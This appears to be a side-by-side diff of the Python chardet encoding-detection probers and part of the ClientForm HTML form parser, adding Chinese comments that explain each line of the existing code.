# 获取编码状态机的下一个状态
coding_state = coding_sm.next_state(c) coding_state = coding_sm.next_state(c)
# 如果状态为错误,则设置编码状态机为非活动状态,活动状态机数量减一
if coding_state == MachineState.ERROR: if coding_state == MachineState.ERROR:
coding_sm.active = False coding_sm.active = False
self.active_sm_count -= 1 self.active_sm_count -= 1
# 如果活动状态机数量小于等于0则设置状态为非匹配
if self.active_sm_count <= 0: if self.active_sm_count <= 0:
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
return self.state return self.state
# 如果状态为匹配,则设置状态为匹配,设置检测到的字符集和语言
elif coding_state == MachineState.ITS_ME: elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
self._detected_charset = coding_sm.get_coding_state_machine() self._detected_charset = coding_sm.get_coding_state_machine()
self._detected_language = coding_sm.language self._detected_language = coding_sm.language
return self.state return self.state
# 返回状态
return self.state return self.state

@ -34,59 +34,90 @@ from .mbcssm import EUCJP_SM_MODEL
class EUCJPProber(MultiByteCharSetProber): class EUCJPProber(MultiByteCharSetProber):
# 初始化EUCJPProber类
def __init__(self): def __init__(self):
super(EUCJPProber, self).__init__() super(EUCJPProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL) self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCJPDistributionAnalysis() self.distribution_analyzer = EUCJPDistributionAnalysis()
# 初始化上下文分析器
self.context_analyzer = EUCJPContextAnalysis() self.context_analyzer = EUCJPContextAnalysis()
# 重置
self.reset() self.reset()
# 重置
def reset(self): def reset(self):
super(EUCJPProber, self).reset() super(EUCJPProber, self).reset()
self.context_analyzer.reset() self.context_analyzer.reset()
# 获取字符集名称
@property @property
def charset_name(self): def charset_name(self):
return "EUC-JP" return "EUC-JP"
# 获取语言
@property @property
def language(self): def language(self):
return "Japanese" return "Japanese"
# 输入字节流
def feed(self, byte_str): def feed(self, byte_str):
for i in range(len(byte_str)): for i in range(len(byte_str)):
# PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte # PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte
# 获取下一个状态
coding_state = self.coding_sm.next_state(byte_str[i]) coding_state = self.coding_sm.next_state(byte_str[i])
# 如果状态为错误
if coding_state == MachineState.ERROR: if coding_state == MachineState.ERROR:
self.logger.debug('%s %s prober hit error at byte %s', self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i) self.charset_name, self.language, i)
# 设置状态为不是该字符集
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
break break
# 如果状态为确定
elif coding_state == MachineState.ITS_ME: elif coding_state == MachineState.ITS_ME:
# 设置状态为确定
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
break break
# 如果状态为开始
elif coding_state == MachineState.START: elif coding_state == MachineState.START:
# 获取当前字符长度
char_len = self.coding_sm.get_current_charlen() char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字符
if i == 0: if i == 0:
# 更新最后一个字符
self._last_char[1] = byte_str[0] self._last_char[1] = byte_str[0]
# 输入最后一个字符和当前字符长度到上下文分析器
self.context_analyzer.feed(self._last_char, char_len) self.context_analyzer.feed(self._last_char, char_len)
# 输入最后一个字符和当前字符长度到分布分析器
self.distribution_analyzer.feed(self._last_char, char_len) self.distribution_analyzer.feed(self._last_char, char_len)
else: else:
# 输入前一个字符和当前字符到上下文分析器
self.context_analyzer.feed(byte_str[i - 1:i + 1], self.context_analyzer.feed(byte_str[i - 1:i + 1],
char_len) char_len)
# 输入前一个字符和当前字符到分布分析器
self.distribution_analyzer.feed(byte_str[i - 1:i + 1], self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len) char_len)
# 更新最后一个字符
self._last_char[0] = byte_str[-1] self._last_char[0] = byte_str[-1]
# 如果状态为检测中
if self.state == ProbingState.DETECTING: if self.state == ProbingState.DETECTING:
# 如果上下文分析器有足够的数据,并且置信度大于阈值
if (self.context_analyzer.got_enough_data() and if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)): (self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 设置状态为确定
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
# 返回状态
return self.state return self.state
# 获取置信度
def get_confidence(self): def get_confidence(self):
# 获取上下文分析器的置信度
context_conf = self.context_analyzer.get_confidence() context_conf = self.context_analyzer.get_confidence()
# 获取分布分析器的置信度
distrib_conf = self.distribution_analyzer.get_confidence() distrib_conf = self.distribution_analyzer.get_confidence()
# 返回最大置信度
return max(context_conf, distrib_conf) return max(context_conf, distrib_conf)

@ -32,16 +32,23 @@ from .mbcssm import EUCKR_SM_MODEL
class EUCKRProber(MultiByteCharSetProber): class EUCKRProber(MultiByteCharSetProber):
# 初始化EUCKRProber类
def __init__(self): def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(EUCKRProber, self).__init__() super(EUCKRProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCKR_SM_MODEL) self.coding_sm = CodingStateMachine(EUCKR_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCKRDistributionAnalysis() self.distribution_analyzer = EUCKRDistributionAnalysis()
# 重置
self.reset() self.reset()
# 获取字符集名称
@property @property
def charset_name(self): def charset_name(self):
return "EUC-KR" return "EUC-KR"
# 获取语言
@property @property
def language(self): def language(self):
return "Korean" return "Korean"

@ -31,16 +31,23 @@ from .chardistribution import EUCTWDistributionAnalysis
from .mbcssm import EUCTW_SM_MODEL from .mbcssm import EUCTW_SM_MODEL
class EUCTWProber(MultiByteCharSetProber): class EUCTWProber(MultiByteCharSetProber):
# 初始化EUCTWProber类
def __init__(self): def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(EUCTWProber, self).__init__() super(EUCTWProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(EUCTW_SM_MODEL) self.coding_sm = CodingStateMachine(EUCTW_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = EUCTWDistributionAnalysis() self.distribution_analyzer = EUCTWDistributionAnalysis()
# 重置
self.reset() self.reset()
# 获取字符集名称
@property @property
def charset_name(self): def charset_name(self):
return "EUC-TW" return "EUC-TW"
# 获取语言
@property @property
def language(self): def language(self):
return "Taiwan" return "Taiwan"

@ -31,16 +31,23 @@ from .chardistribution import GB2312DistributionAnalysis
from .mbcssm import GB2312_SM_MODEL from .mbcssm import GB2312_SM_MODEL
class GB2312Prober(MultiByteCharSetProber): class GB2312Prober(MultiByteCharSetProber):
# 初始化GB2312Prober类
def __init__(self): def __init__(self):
# 调用父类MultiByteCharSetProber的初始化方法
super(GB2312Prober, self).__init__() super(GB2312Prober, self).__init__()
# 初始化GB2312编码状态机
self.coding_sm = CodingStateMachine(GB2312_SM_MODEL) self.coding_sm = CodingStateMachine(GB2312_SM_MODEL)
# 初始化GB2312分布分析器
self.distribution_analyzer = GB2312DistributionAnalysis() self.distribution_analyzer = GB2312DistributionAnalysis()
# 重置
self.reset() self.reset()
# 获取字符集名称
@property @property
def charset_name(self): def charset_name(self):
return "GB2312" return "GB2312"
# 获取语言
@property @property
def language(self): def language(self):
return "Chinese" return "Chinese"

@ -152,17 +152,27 @@ class HebrewProber(CharSetProber):
LOGICAL_HEBREW_NAME = "windows-1255" LOGICAL_HEBREW_NAME = "windows-1255"
def __init__(self): def __init__(self):
# 初始化HebrewProber类
super(HebrewProber, self).__init__() super(HebrewProber, self).__init__()
# 初始化_final_char_logical_score为None
self._final_char_logical_score = None self._final_char_logical_score = None
# 初始化_final_char_visual_score为None
self._final_char_visual_score = None self._final_char_visual_score = None
# 初始化_prev为None
self._prev = None self._prev = None
# 初始化_before_prev为None
self._before_prev = None self._before_prev = None
# 初始化_logical_prober为None
self._logical_prober = None self._logical_prober = None
# 初始化_visual_prober为None
self._visual_prober = None self._visual_prober = None
# 调用reset方法
self.reset() self.reset()
def reset(self): def reset(self):
# 重置_final_char_logical_score为0
self._final_char_logical_score = 0 self._final_char_logical_score = 0
# 重置_final_char_visual_score为0
self._final_char_visual_score = 0 self._final_char_visual_score = 0
# The two last characters seen in the previous buffer, # The two last characters seen in the previous buffer,
# mPrev and mBeforePrev are initialized to space in order to simulate # mPrev and mBeforePrev are initialized to space in order to simulate

@ -37,17 +37,28 @@ class MultiByteCharSetProber(CharSetProber):
""" """
def __init__(self, lang_filter=None): def __init__(self, lang_filter=None):
# 初始化函数传入参数lang_filter
super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter) super(MultiByteCharSetProber, self).__init__(lang_filter=lang_filter)
# 调用父类的初始化函数
self.distribution_analyzer = None self.distribution_analyzer = None
# 初始化分布分析器
self.coding_sm = None self.coding_sm = None
# 初始化编码状态机
self._last_char = [0, 0] self._last_char = [0, 0]
# 初始化最后一个字符
def reset(self): def reset(self):
# 重置函数
super(MultiByteCharSetProber, self).reset() super(MultiByteCharSetProber, self).reset()
# 调用父类的重置函数
if self.coding_sm: if self.coding_sm:
# 如果编码状态机存在
self.coding_sm.reset() self.coding_sm.reset()
# 重置编码状态机
if self.distribution_analyzer: if self.distribution_analyzer:
# 如果分布分析器存在
self.distribution_analyzer.reset() self.distribution_analyzer.reset()
# 重置分布分析器
self._last_char = [0, 0] self._last_char = [0, 0]
@property @property
@ -59,33 +70,45 @@ class MultiByteCharSetProber(CharSetProber):
raise NotImplementedError raise NotImplementedError
def feed(self, byte_str): def feed(self, byte_str):
# 遍历byte_str中的每个字节
for i in range(len(byte_str)): for i in range(len(byte_str)):
# 获取当前字节的编码状态
coding_state = self.coding_sm.next_state(byte_str[i]) coding_state = self.coding_sm.next_state(byte_str[i])
# 如果编码状态为错误则记录错误信息并将状态设置为NOT_ME
if coding_state == MachineState.ERROR: if coding_state == MachineState.ERROR:
self.logger.debug('%s %s prober hit error at byte %s', self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i) self.charset_name, self.language, i)
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
break break
# 如果编码状态为确定则将状态设置为FOUND_IT
elif coding_state == MachineState.ITS_ME: elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
break break
# 如果编码状态为开始,则获取当前字符长度
elif coding_state == MachineState.START: elif coding_state == MachineState.START:
char_len = self.coding_sm.get_current_charlen() char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字节则将当前字节和上一个字节作为参数传入feed方法
if i == 0: if i == 0:
self._last_char[1] = byte_str[0] self._last_char[1] = byte_str[0]
self.distribution_analyzer.feed(self._last_char, char_len) self.distribution_analyzer.feed(self._last_char, char_len)
# 否则将当前字节和上一个字节作为参数传入feed方法
else: else:
self.distribution_analyzer.feed(byte_str[i - 1:i + 1], self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len) char_len)
# 将最后一个字节赋值给_last_char[0]
self._last_char[0] = byte_str[-1] self._last_char[0] = byte_str[-1]
# 如果状态为DETECTING则判断是否已经获取足够的数据并且置信度是否大于SHORTCUT_THRESHOLD
if self.state == ProbingState.DETECTING: if self.state == ProbingState.DETECTING:
if (self.distribution_analyzer.got_enough_data() and if (self.distribution_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)): (self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 如果满足条件则将状态设置为FOUND_IT
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
# 返回状态
return self.state return self.state
def get_confidence(self): def get_confidence(self):
# 获取置信度
return self.distribution_analyzer.get_confidence() return self.distribution_analyzer.get_confidence()

@ -39,16 +39,20 @@ from .euctwprober import EUCTWProber
class MBCSGroupProber(CharSetGroupProber): class MBCSGroupProber(CharSetGroupProber):
# 初始化MBCSGroupProber类继承自CharSetGroupProber类
def __init__(self, lang_filter=None): def __init__(self, lang_filter=None):
# 调用父类CharSetGroupProber的初始化方法
super(MBCSGroupProber, self).__init__(lang_filter=lang_filter) super(MBCSGroupProber, self).__init__(lang_filter=lang_filter)
# 定义一个包含多种字符集探测器的列表
self.probers = [ self.probers = [
UTF8Prober(), UTF8Prober(), # UTF-8字符集探测器
SJISProber(), SJISProber(), # Shift_JIS字符集探测器
EUCJPProber(), EUCJPProber(), # EUC-JP字符集探测器
GB2312Prober(), GB2312Prober(), # GB2312字符集探测器
EUCKRProber(), EUCKRProber(), # EUCKR字符集探测器
CP949Prober(), CP949Prober(), # CP949字符集探测器
Big5Prober(), Big5Prober(), # Big5字符集探测器
EUCTWProber() EUCTWProber() # EUCTW字符集探测器
] ]
# 重置探测器
self.reset() self.reset()

@ -31,13 +31,19 @@ from .enums import CharacterCategory, ProbingState, SequenceLikelihood
class SingleByteCharSetProber(CharSetProber): class SingleByteCharSetProber(CharSetProber):
# 定义样本大小
SAMPLE_SIZE = 64 SAMPLE_SIZE = 64
# 定义相对阈值
SB_ENOUGH_REL_THRESHOLD = 1024 # 0.25 * SAMPLE_SIZE^2 SB_ENOUGH_REL_THRESHOLD = 1024 # 0.25 * SAMPLE_SIZE^2
# 定义正向阈值
POSITIVE_SHORTCUT_THRESHOLD = 0.95 POSITIVE_SHORTCUT_THRESHOLD = 0.95
# 定义负向阈值
NEGATIVE_SHORTCUT_THRESHOLD = 0.05 NEGATIVE_SHORTCUT_THRESHOLD = 0.05
def __init__(self, model, reversed=False, name_prober=None): def __init__(self, model, reversed=False, name_prober=None):
# 调用父类构造函数
super(SingleByteCharSetProber, self).__init__() super(SingleByteCharSetProber, self).__init__()
# 设置模型
self._model = model self._model = model
# TRUE if we need to reverse every pair in the model lookup # TRUE if we need to reverse every pair in the model lookup
self._reversed = reversed self._reversed = reversed
@ -51,6 +57,7 @@ class SingleByteCharSetProber(CharSetProber):
self.reset() self.reset()
def reset(self): def reset(self):
# 重置函数
super(SingleByteCharSetProber, self).reset() super(SingleByteCharSetProber, self).reset()
# char order of last character # char order of last character
self._last_order = 255 self._last_order = 255
@ -69,16 +76,20 @@ class SingleByteCharSetProber(CharSetProber):
@property @property
def language(self): def language(self):
# 如果_name_prober存在则返回_name_prober的语言否则返回_model中的语言
if self._name_prober: if self._name_prober:
return self._name_prober.language return self._name_prober.language
else: else:
return self._model.get('language') return self._model.get('language')
def feed(self, byte_str): def feed(self, byte_str):
# 如果_model中的keep_english_letter为False则过滤掉国际字符
if not self._model['keep_english_letter']: if not self._model['keep_english_letter']:
byte_str = self.filter_international_words(byte_str) byte_str = self.filter_international_words(byte_str)
# 如果byte_str为空则返回状态
if not byte_str: if not byte_str:
return self.state return self.state
# 获取字符到顺序的映射
char_to_order_map = self._model['char_to_order_map'] char_to_order_map = self._model['char_to_order_map']
for i, c in enumerate(byte_str): for i, c in enumerate(byte_str):
# XXX: Order is in range 1-64, so one would think we want 0-63 here, # XXX: Order is in range 1-64, so one would think we want 0-63 here,
@ -122,11 +133,17 @@ class SingleByteCharSetProber(CharSetProber):
return self.state return self.state
def get_confidence(self): def get_confidence(self):
# 初始化r为0.01
r = 0.01 r = 0.01
# 如果总序列数大于0
if self._total_seqs > 0: if self._total_seqs > 0:
# 计算r的值
r = ((1.0 * self._seq_counters[SequenceLikelihood.POSITIVE]) / r = ((1.0 * self._seq_counters[SequenceLikelihood.POSITIVE]) /
self._total_seqs / self._model['typical_positive_ratio']) self._total_seqs / self._model['typical_positive_ratio'])
# 乘以字符频率和总字符数
r = r * self._freq_char / self._total_char r = r * self._freq_char / self._total_char
# 如果r大于等于1.0则将r设置为0.99
if r >= 1.0: if r >= 1.0:
r = 0.99 r = 0.99
# 返回r的值
return r return r

@ -34,59 +34,94 @@ from .enums import ProbingState, MachineState
class SJISProber(MultiByteCharSetProber): class SJISProber(MultiByteCharSetProber):
# 初始化函数
def __init__(self): def __init__(self):
# 调用父类的初始化函数
super(SJISProber, self).__init__() super(SJISProber, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(SJIS_SM_MODEL) self.coding_sm = CodingStateMachine(SJIS_SM_MODEL)
# 初始化分布分析器
self.distribution_analyzer = SJISDistributionAnalysis() self.distribution_analyzer = SJISDistributionAnalysis()
# 初始化上下文分析器
self.context_analyzer = SJISContextAnalysis() self.context_analyzer = SJISContextAnalysis()
# 重置分析器
self.reset() self.reset()
# 重置函数
def reset(self): def reset(self):
# 调用父类的重置函数
super(SJISProber, self).reset() super(SJISProber, self).reset()
# 重置上下文分析器
self.context_analyzer.reset() self.context_analyzer.reset()
@property @property
def charset_name(self): def charset_name(self):
# 返回字符集名称
return self.context_analyzer.charset_name return self.context_analyzer.charset_name
@property @property
def language(self): def language(self):
# 返回语言
return "Japanese" return "Japanese"
def feed(self, byte_str): def feed(self, byte_str):
# 遍历字节字符串
for i in range(len(byte_str)): for i in range(len(byte_str)):
# 获取下一个状态
coding_state = self.coding_sm.next_state(byte_str[i]) coding_state = self.coding_sm.next_state(byte_str[i])
# 如果状态为错误
if coding_state == MachineState.ERROR: if coding_state == MachineState.ERROR:
# 记录错误日志
self.logger.debug('%s %s prober hit error at byte %s', self.logger.debug('%s %s prober hit error at byte %s',
self.charset_name, self.language, i) self.charset_name, self.language, i)
# 设置状态为不是该字符集
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
break break
# 如果状态为确定
elif coding_state == MachineState.ITS_ME: elif coding_state == MachineState.ITS_ME:
# 设置状态为确定
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
break break
# 如果状态为开始
elif coding_state == MachineState.START: elif coding_state == MachineState.START:
# 获取当前字符长度
char_len = self.coding_sm.get_current_charlen() char_len = self.coding_sm.get_current_charlen()
# 如果是第一个字符
if i == 0: if i == 0:
# 更新最后一个字符
self._last_char[1] = byte_str[0] self._last_char[1] = byte_str[0]
# 向上下文分析器输入字符
self.context_analyzer.feed(self._last_char[2 - char_len:], self.context_analyzer.feed(self._last_char[2 - char_len:],
char_len) char_len)
# 向分布分析器输入字符
self.distribution_analyzer.feed(self._last_char, char_len) self.distribution_analyzer.feed(self._last_char, char_len)
else: else:
# 向上下文分析器输入字符
self.context_analyzer.feed(byte_str[i + 1 - char_len:i + 3 self.context_analyzer.feed(byte_str[i + 1 - char_len:i + 3
- char_len], char_len) - char_len], char_len)
# 向分布分析器输入字符
self.distribution_analyzer.feed(byte_str[i - 1:i + 1], self.distribution_analyzer.feed(byte_str[i - 1:i + 1],
char_len) char_len)
# 更新最后一个字符
self._last_char[0] = byte_str[-1] self._last_char[0] = byte_str[-1]
# 如果状态为检测中
if self.state == ProbingState.DETECTING: if self.state == ProbingState.DETECTING:
# 如果上下文分析器有足够的数据,并且置信度大于阈值
if (self.context_analyzer.got_enough_data() and if (self.context_analyzer.got_enough_data() and
(self.get_confidence() > self.SHORTCUT_THRESHOLD)): (self.get_confidence() > self.SHORTCUT_THRESHOLD)):
# 设置状态为确定
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
# 返回状态
return self.state return self.state
# 获取置信度
def get_confidence(self): def get_confidence(self):
# 获取上下文分析器的置信度
context_conf = self.context_analyzer.get_confidence() context_conf = self.context_analyzer.get_confidence()
# 获取分布分析器的置信度
distrib_conf = self.distribution_analyzer.get_confidence() distrib_conf = self.distribution_analyzer.get_confidence()
# 返回上下文置信度和分布置信度中的最大值
return max(context_conf, distrib_conf) return max(context_conf, distrib_conf)

@ -79,16 +79,27 @@ class UniversalDetector(object):
'iso-8859-13': 'Windows-1257'} 'iso-8859-13': 'Windows-1257'}
def __init__(self, lang_filter=LanguageFilter.ALL): def __init__(self, lang_filter=LanguageFilter.ALL):
# 初始化语言过滤器
self._esc_charset_prober = None self._esc_charset_prober = None
# 初始化字符集探测器
self._charset_probers = [] self._charset_probers = []
# 初始化结果
self.result = None self.result = None
# 初始化完成标志
self.done = None self.done = None
# 初始化是否获取数据标志
self._got_data = None self._got_data = None
# 初始化输入状态
self._input_state = None self._input_state = None
# 初始化最后一个字符
self._last_char = None self._last_char = None
# 设置语言过滤器
self.lang_filter = lang_filter self.lang_filter = lang_filter
# 获取日志记录器
self.logger = logging.getLogger(__name__) self.logger = logging.getLogger(__name__)
# 初始化是否包含Windows字节标志
self._has_win_bytes = None self._has_win_bytes = None
# 重置
self.reset() self.reset()
def reset(self): def reset(self):
@ -97,14 +108,22 @@ class UniversalDetector(object):
initial states. This is called by ``__init__``, so you only need to initial states. This is called by ``__init__``, so you only need to
call this directly in between analyses of different documents. call this directly in between analyses of different documents.
""" """
# 重置结果
self.result = {'encoding': None, 'confidence': 0.0, 'language': None} self.result = {'encoding': None, 'confidence': 0.0, 'language': None}
# 重置完成标志
self.done = False self.done = False
# 重置是否接收到数据标志
self._got_data = False self._got_data = False
# 重置是否有win字节标志
self._has_win_bytes = False self._has_win_bytes = False
# 重置输入状态
self._input_state = InputState.PURE_ASCII self._input_state = InputState.PURE_ASCII
# 重置最后一个字符
self._last_char = b'' self._last_char = b''
# 如果有esc字符集探测器重置它
if self._esc_charset_prober: if self._esc_charset_prober:
self._esc_charset_prober.reset() self._esc_charset_prober.reset()
# 重置所有字符集探测器
for prober in self._charset_probers: for prober in self._charset_probers:
prober.reset() prober.reset()

@ -33,50 +33,75 @@ from .mbcssm import UTF8_SM_MODEL
class UTF8Prober(CharSetProber): class UTF8Prober(CharSetProber):
# 定义一个常量表示一个字符的初始概率为0.5
ONE_CHAR_PROB = 0.5 ONE_CHAR_PROB = 0.5
# 初始化函数
def __init__(self): def __init__(self):
# 调用父类的初始化函数
super(UTF8Prober, self).__init__() super(UTF8Prober, self).__init__()
# 初始化编码状态机
self.coding_sm = CodingStateMachine(UTF8_SM_MODEL) self.coding_sm = CodingStateMachine(UTF8_SM_MODEL)
# 初始化多字节字符数量
self._num_mb_chars = None self._num_mb_chars = None
# 调用重置函数
self.reset() self.reset()
# 重置函数
def reset(self): def reset(self):
# 调用父类的重置函数
super(UTF8Prober, self).reset() super(UTF8Prober, self).reset()
# 重置编码状态机
self.coding_sm.reset() self.coding_sm.reset()
# 重置多字节字符数量
self._num_mb_chars = 0 self._num_mb_chars = 0
# 获取字符集名称的属性
@property @property
def charset_name(self): def charset_name(self):
# 返回字符集名称
return "utf-8" return "utf-8"
# 获取语言名称的属性
@property @property
def language(self): def language(self):
# 返回语言名称
return "" return ""
def feed(self, byte_str): def feed(self, byte_str):
# 遍历byte_str中的每个字符
for c in byte_str: for c in byte_str:
# 获取下一个状态
coding_state = self.coding_sm.next_state(c) coding_state = self.coding_sm.next_state(c)
# 如果状态为ERROR则将状态设置为NOT_ME并跳出循环
if coding_state == MachineState.ERROR: if coding_state == MachineState.ERROR:
self._state = ProbingState.NOT_ME self._state = ProbingState.NOT_ME
break break
# 如果状态为ITS_ME则将状态设置为FOUND_IT并跳出循环
elif coding_state == MachineState.ITS_ME: elif coding_state == MachineState.ITS_ME:
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
break break
# 如果状态为START且当前字符长度大于等于2则将_num_mb_chars加1
elif coding_state == MachineState.START: elif coding_state == MachineState.START:
if self.coding_sm.get_current_charlen() >= 2: if self.coding_sm.get_current_charlen() >= 2:
self._num_mb_chars += 1 self._num_mb_chars += 1
# 如果状态为DETECTING且置信度大于SHORTCUT_THRESHOLD则将状态设置为FOUND_IT
if self.state == ProbingState.DETECTING: if self.state == ProbingState.DETECTING:
if self.get_confidence() > self.SHORTCUT_THRESHOLD: if self.get_confidence() > self.SHORTCUT_THRESHOLD:
self._state = ProbingState.FOUND_IT self._state = ProbingState.FOUND_IT
# 返回状态
return self.state return self.state
def get_confidence(self): def get_confidence(self):
# 初始化 unlike 为 0.99
unlike = 0.99 unlike = 0.99
# 如果_num_mb_chars 小于 6则 unlike 乘以 ONE_CHAR_PROB 的 _num_mb_chars 次方
if self._num_mb_chars < 6: if self._num_mb_chars < 6:
unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars unlike *= self.ONE_CHAR_PROB ** self._num_mb_chars
# 返回 1.0 减去 unlike
return 1.0 - unlike return 1.0 - unlike
# 否则返回 unlike
else: else:
return unlike return unlike

@ -67,30 +67,47 @@ __all__ = ['AmbiguityError', 'CheckboxControl', 'Control',
'TextareaControl', 'XHTMLCompatibleFormParser'] 'TextareaControl', 'XHTMLCompatibleFormParser']
try: try:
# 尝试导入logging和inspect模块
import logging import logging
import inspect import inspect
except ImportError: except ImportError:
# 如果导入失败定义一个空的debug函数
def debug(msg, *args, **kwds): def debug(msg, *args, **kwds):
pass pass
else: else:
# 如果导入成功定义一个_logger对象
_logger = logging.getLogger("ClientForm") _logger = logging.getLogger("ClientForm")
# 定义一个优化hack变量
OPTIMIZATION_HACK = True OPTIMIZATION_HACK = True
# 定义一个debug函数
def debug(msg, *args, **kwds): def debug(msg, *args, **kwds):
# 如果优化hack为True则返回
if OPTIMIZATION_HACK: if OPTIMIZATION_HACK:
return return
# 获取调用者的函数名
caller_name = inspect.stack()[1][3] caller_name = inspect.stack()[1][3]
# 定义一个扩展的消息
extended_msg = '%%s %s' % msg extended_msg = '%%s %s' % msg
# 定义一个扩展的参数
extended_args = (caller_name,)+args extended_args = (caller_name,)+args
# 调用_logger对象的debug方法
debug = _logger.debug(extended_msg, *extended_args, **kwds) debug = _logger.debug(extended_msg, *extended_args, **kwds)
# 定义一个_show_debug_messages函数
def _show_debug_messages(): def _show_debug_messages():
# 定义一个全局变量OPTIMIZATION_HACK
global OPTIMIZATION_HACK global OPTIMIZATION_HACK
# 将优化hack设置为False
OPTIMIZATION_HACK = False OPTIMIZATION_HACK = False
# 将_logger对象的日志级别设置为DEBUG
_logger.setLevel(logging.DEBUG) _logger.setLevel(logging.DEBUG)
# 定义一个StreamHandler对象
handler = logging.StreamHandler(sys.stdout) handler = logging.StreamHandler(sys.stdout)
# 将StreamHandler对象的日志级别设置为DEBUG
handler.setLevel(logging.DEBUG) handler.setLevel(logging.DEBUG)
# 将StreamHandler对象添加到_logger对象中
_logger.addHandler(handler) _logger.addHandler(handler)
try: try:
@ -114,13 +131,17 @@ except ImportError:
import sys, re, random import sys, re, random
if sys.version_info >= (3, 0): if sys.version_info >= (3, 0):
# 如果Python版本大于等于3.0则将xrange替换为range
xrange = range xrange = range
# monkeypatch to fix http://www.python.org/sf/803422 :-( # monkeypatch to fix http://www.python.org/sf/803422 :-(
# 修补monkeypatch以修复http://www.python.org/sf/803422 :-(
sgmllib.charref = re.compile("&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]") sgmllib.charref = re.compile("&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]")
# HTMLParser.HTMLParser is recent, so live without it if it's not available # HTMLParser.HTMLParser is recent, so live without it if it's not available
# (also, sgmllib.SGMLParser is much more tolerant of bad HTML) # (also, sgmllib.SGMLParser is much more tolerant of bad HTML)
# HTMLParser.HTMLParser是最近的如果不可用则没有它
# 另外sgmllib.SGMLParser对不良HTML的容忍度更高
try: try:
import HTMLParser import HTMLParser
except ImportError: except ImportError:
@ -131,9 +152,11 @@ else:
try: try:
import warnings import warnings
except ImportError: except ImportError:
# 如果没有导入warnings模块则定义一个空函数
def deprecation(message, stack_offset=0): def deprecation(message, stack_offset=0):
pass pass
else: else:
# 如果成功导入warnings模块则定义一个警告函数
def deprecation(message, stack_offset=0): def deprecation(message, stack_offset=0):
warnings.warn(message, DeprecationWarning, stacklevel=3+stack_offset) warnings.warn(message, DeprecationWarning, stacklevel=3+stack_offset)
@ -224,29 +247,39 @@ string.
return '&'.join(l) return '&'.join(l)
def unescape(data, entities, encoding=DEFAULT_ENCODING): def unescape(data, entities, encoding=DEFAULT_ENCODING):
# 如果data为None或者data中不包含"&"则直接返回data
if data is None or "&" not in data: if data is None or "&" not in data:
return data return data
# 如果data是字符串类型则将encoding设置为None
if isinstance(data, six.string_types): if isinstance(data, six.string_types):
encoding = None encoding = None
# 定义一个函数,用于替换实体
def replace_entities(match, entities=entities, encoding=encoding): def replace_entities(match, entities=entities, encoding=encoding):
# 获取匹配到的实体
ent = match.group() ent = match.group()
# 如果实体以"#"开头则调用unescape_charref函数进行替换
if ent[1] == "#": if ent[1] == "#":
return unescape_charref(ent[2:-1], encoding) return unescape_charref(ent[2:-1], encoding)
# 从entities中获取实体的替换值
repl = entities.get(ent) repl = entities.get(ent)
# 如果替换值存在并且encoding不为None则尝试将替换值解码为字符串
if repl is not None: if repl is not None:
if hasattr(repl, "decode") and encoding is not None: if hasattr(repl, "decode") and encoding is not None:
try: try:
repl = repl.decode(encoding) repl = repl.decode(encoding)
except UnicodeError: except UnicodeError:
repl = ent repl = ent
# 如果替换值不存在,则将替换值设置为实体本身
else: else:
repl = ent repl = ent
# 返回替换值
return repl return repl
# 使用正则表达式替换data中的实体
return re.sub(r"&#?[A-Za-z0-9]+?;", replace_entities, data) return re.sub(r"&#?[A-Za-z0-9]+?;", replace_entities, data)
def unescape_charref(data, encoding): def unescape_charref(data, encoding):
@ -646,31 +679,47 @@ class _AbstractFormParser:
self._textarea = None self._textarea = None
def start_label(self, attrs): def start_label(self, attrs):
# 打印attrs
debug("%s", attrs) debug("%s", attrs)
# 如果当前标签存在,则结束标签
if self._current_label: if self._current_label:
self.end_label() self.end_label()
# 创建一个空字典
d = {} d = {}
# 遍历attrs
for key, val in attrs: for key, val in attrs:
# 如果val需要转义则进行转义
d[key] = self.unescape_attr_if_required(val) d[key] = self.unescape_attr_if_required(val)
# 如果存在for属性则taken为True
taken = bool(d.get("for")) # empty id is invalid taken = bool(d.get("for")) # empty id is invalid
# 添加__text属性值为空字符串
d["__text"] = "" d["__text"] = ""
# 添加__taken属性值为taken
d["__taken"] = taken d["__taken"] = taken
# 如果taken为True则将d添加到labels列表中
